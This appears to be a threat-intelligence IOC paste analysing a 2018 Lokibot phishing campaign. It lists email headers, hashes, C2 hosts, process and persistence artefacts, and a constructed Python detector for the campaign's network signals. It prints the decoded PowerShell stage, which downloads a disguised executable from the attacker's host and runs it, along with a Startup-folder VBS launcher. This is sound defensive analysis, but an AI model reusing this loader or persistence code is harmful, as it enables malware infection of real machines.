VRad

#Lokibot_161018

Oct 17th, 2018
#IOC #OptiData #VR #Lokibot #X97M #macro #powershell

https://pastebin.com/LPqjHUkQ
FAQ:
https://radetskiy.wordpress.com/?s=lokibot

attack_vector
--------------
email > attach XLS > VBA > powershell > GET > %userprofile%\MyP8Mihuih.exe

email_headers
--------------
Received: from gunimo.com ([159.65.179.93])
by mailsrv2.victim1.com (8.15.2/8.15.2) with ESMTP id w9GDZxoi074233
for <user0@org2.victim1.com>; Tue, 16 Oct 2018 16:35:59 +0300 (EEST)
(envelope-from replymail202@gmail.com)
Received: from [103.99.1.148] (helo=User)
by gunimo.com with esmtpa (Exim 4.84_2)
(envelope-from <replymail202@gmail.com>)
id 1gCPVH-00082K-4q; Tue, 16 Oct 2018 13:35:24 +0000
Reply-To: <replymail202@gmail.com>
From: "FREDRICK (BESTLABS)"<replymail202@gmail.com>
Subject: Purchase Order (BESTLABS)
Date: Tue, 16 Oct 2018 06:35:11 -0700

email_subjects
--------------
Purchase Order (BESTLABS)

files
--------------
SHA-256 a0735fd6ae06e59370e2702bdfda81f90d9b2489f3a483104469a0f4c596d552
File name 87041166.xls
File size 61 KB

SHA-256 078028b6a99daeb8576b1c33073732b0b65bd6c4eddcc2b061fdadf037e9063c
File name chri1.jpg (not an image: a Win32 PE, DOS stub text "This program must be run under Win32")
File size 661 KB

activity
**************

payload
181.174.165.161 http://octap{.} igg{.} biz/01/chri1.jpg
C2
103.109.184.60 http://octone{.} igg{.} biz/chri1/cgi.php

netwrk
--------------
181.174.165.161 octap{.} igg{.} biz GET /01/chri1.jpg HTTP/1.1 (!) no User-Agent
103.109.184.60 octone{.} igg{.} biz POST /chri1/cgi.php HTTP/1.0 (!) Mozilla/4.08 (Charon; Inferno) < #Lokibot User-Agent

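Detection logic for the two network signals noted in netwrk (an image-extension GET with an empty User-Agent from the stage-1 downloader, and Lokibot's fixed "Mozilla/4.08 (Charon; Inferno)" User-Agent on the C2 POST), plus a body check for the .jpg that is really a PE. This is an added example, not part of the paste: the proxy log layout and the sample lines are constructed; only the hosts, paths and User-Agent string come from the IOCs above.

```python
import re
from typing import Dict, List

# Lokibot's fixed User-Agent, as recorded on the C2 POST in the netwrk section.
LOKIBOT_UA = "Mozilla/4.08 (Charon; Inferno)"
IMAGE_EXT = re.compile(r"\.(jpe?g|png|gif|bmp)(\?|$)", re.IGNORECASE)

# Assumed (constructed) proxy log layout:
#   client_ip method host path status "user_agent"
LOG_RE = re.compile(
    r'^(?P<client>\S+) (?P<method>[A-Z]+) (?P<host>\S+) (?P<path>\S+) '
    r'(?P<status>\d{3}) "(?P<ua>[^"]*)"$'
)

# Constructed sample lines; hosts kept defanged as in the paste (spaces removed).
SAMPLE_LOG = [
    '10.0.0.5 GET octap{.}igg{.}biz /01/chri1.jpg 200 ""',
    '10.0.0.5 POST octone{.}igg{.}biz /chri1/cgi.php 200 "Mozilla/4.08 (Charon; Inferno)"',
    '10.0.0.7 GET cdn.example.invalid /logo.png 200 "Mozilla/5.0 (Windows NT 10.0)"',
]


def classify(line: str) -> List[str]:
    """Indicators matched by one proxy log line (empty list = nothing suspicious)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    hits = []
    if m["ua"] == LOKIBOT_UA:
        hits.append("lokibot_user_agent")
    # WebClient.DownloadFile sends no User-Agent; a bare GET for an "image"
    # is how the stage-1 PowerShell fetched chri1.jpg.
    if m["method"] == "GET" and m["ua"] == "" and IMAGE_EXT.search(m["path"]):
        hits.append("no_ua_image_download")
    return hits


def looks_like_pe(body: bytes) -> bool:
    """True if a supposed image body carries the MZ header or the DOS stub text."""
    return body[:2] == b"MZ" or b"This program must be run under Win32" in body


def scan(lines: List[str]) -> Dict[str, List[str]]:
    """Map each flagged log line to the indicators it matched."""
    return {ln: hits for ln in lines if (hits := classify(ln))}


if __name__ == "__main__":
    for ln, hits in scan(SAMPLE_LOG).items():
        print(hits, ln)
```
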
comp
--------------
powershell.exe 1148 181.174.165.161 80 ESTABLISHED
[System Process] 0 103.109.184.60 80 TIME_WAIT
[System Process] 0 103.109.184.60 80 TIME_WAIT
iigyhe.exe 2364 103.109.184.60 80 ESTABLISHED

proc
--------------
"C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE" /e\
C:\Windows\SysWOW64\cMD.exe cMD & /C PowErSHeLl -En ZgB1AG4AYwB0AGkAbwBuACAARAAzAG8AQgBYAGQASABiAHMANwA4AH...
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PowErSHeLl -En ZgB1AG4AYwB0AGkAbwBuACAARAAzAG8AQgBYAGQASABiAHMANwA4AH...
"C:\Users\operator\MyP8Mihuih.exe"
"C:\Users\operator\AppData\Roaming\iihge\iigyhe.exe"
"C:\Users\operator\AppData\Roaming\iihge\iigyhe.exe"

base64_decode
---------------
# decoded -En payload: helper takes (url, path), fetches with WebClient.DownloadFile (no User-Agent set) and launches the file via Shell.Application
function D3oBXdHbs78ytXnPChs ( $NESUp2oGBWEZeslGaAmpDeDWO , $zZLx5PqAyovtf8HsUEDmfbEGOL )
{(New-Object System.Net.WebClient).DownloadFile( $NESUp2oGBWEZeslGaAmpDeDWO , $zZLx5PqAyovtf8HsUEDmfbEGOL );
(New-Object -com Shell.Application).ShellExecute( $zZLx5PqAyovtf8HsUEDmfbEGOL ); }
# drop path is %USERPROFILE%\MyP8Mihuih.exe; the empty catch swallows any error, so a failed download leaves no trace
try{
$mVLKMABGL2alewvZd2=$env:USERPROFILE+'\MyP8Mihuih.exe';
D3oBXdHbs78ytXnPChs 'http://octap{.} igg{.} biz/01/chri1.jpg' $mVLKMABGL2alewvZd2;
}catch{}

persist
--------------
C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup 17.10.2018 17:03
iihge.vbs c:\users\operator\appdata\roaming\microsoft\windows\start menu\programs\startup\iihge.vbs 17.10.2018 17:03

vbs
--------------
' Startup-folder launcher; the two variable spellings differ only in case (VBScript is case-insensitive)
Set qqRtjAUYnqWIRiSE = CreateOBject("wScriPt.sheLl")
qQrTjAUyNQwIRise.rUn """C:\Users\operator\AppData\Roaming\iihge\iigyhe.exe"""

drop
--------------
C:\Users\operator\MyP8Mihuih.exe
C:\Users\operator\AppData\Roaming\39B01F
C:\Users\operator\AppData\Roaming\39B01F\FA74A3.exe
C:\Users\operator\AppData\Roaming\39B01F\FA74A3.hdb
C:\Users\operator\AppData\Roaming\iihge

# # #
https://www.virustotal.com/#/file/a0735fd6ae06e59370e2702bdfda81f90d9b2489f3a483104469a0f4c596d552/details
https://www.virustotal.com/#/file/078028b6a99daeb8576b1c33073732b0b65bd6c4eddcc2b061fdadf037e9063c/details
https://analyze.intezer.com/#/analyses/a8e828da-f1f2-4817-ad4d-4c004486deb4